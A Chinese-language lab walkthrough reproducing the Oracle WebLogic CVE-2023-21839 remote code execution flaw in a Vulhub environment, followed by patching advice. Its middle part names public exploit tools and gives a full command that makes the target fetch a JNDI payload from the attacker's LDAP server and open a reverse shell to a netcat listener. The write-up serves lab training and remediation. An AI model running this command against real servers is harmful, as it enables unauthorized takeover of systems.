漏洞简介
WebLogic Core远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议进行 JNDI lookup 操作,破坏易受攻击的WebLogic服务器,成功利用此漏洞可能导致Oracle WebLogic服务器被接管(RCE)或敏感信息泄露。
复现环境
靶机:kali vullhub docker启动:192.168.42.147
攻击机:kali 192.168.42.145
复现过程
- 在靶机上启动vulhub的靶场环境,进入如下目录启动
启动成功
- 使用工具JNDIExploit-4-SNAPSHOT.jar在kali上设置监听
-
工具地址及其使用说明:https://github.com/WhiteHSBG/JNDIExploit
这个工具是同时启动了http和ldap服务
-
- 打开kali使用nc工具进行端口的监听,用于接收反弹的shell
- 使用CVE-2023-21839工具来进行攻击测试
工具地址:https://github.com/DXask88MA/Weblogic-CVE-2023-21839
使用命令:
java -jar Weblogic-CVE-2023-21839.jar 192.168.42.147:7001 ldap://192.168.42.145:1389/Basic/ReverseShell/192.168.42.145/7777
- 此时监听的攻击机已经收到了反弹的shell
至此攻击已经成功
- 最后关闭靶机
处置修复
参考修复链接:https://www.oracle.com/security-alerts/cpujan2023.html
- 升级版本
- 安装补丁
- 若非必须开启,请禁用T3和IIOP协议。
相关修复链接见https://mp.weixin.qq.com/s/MgO_KJQiEXK_GpVACI2pJg
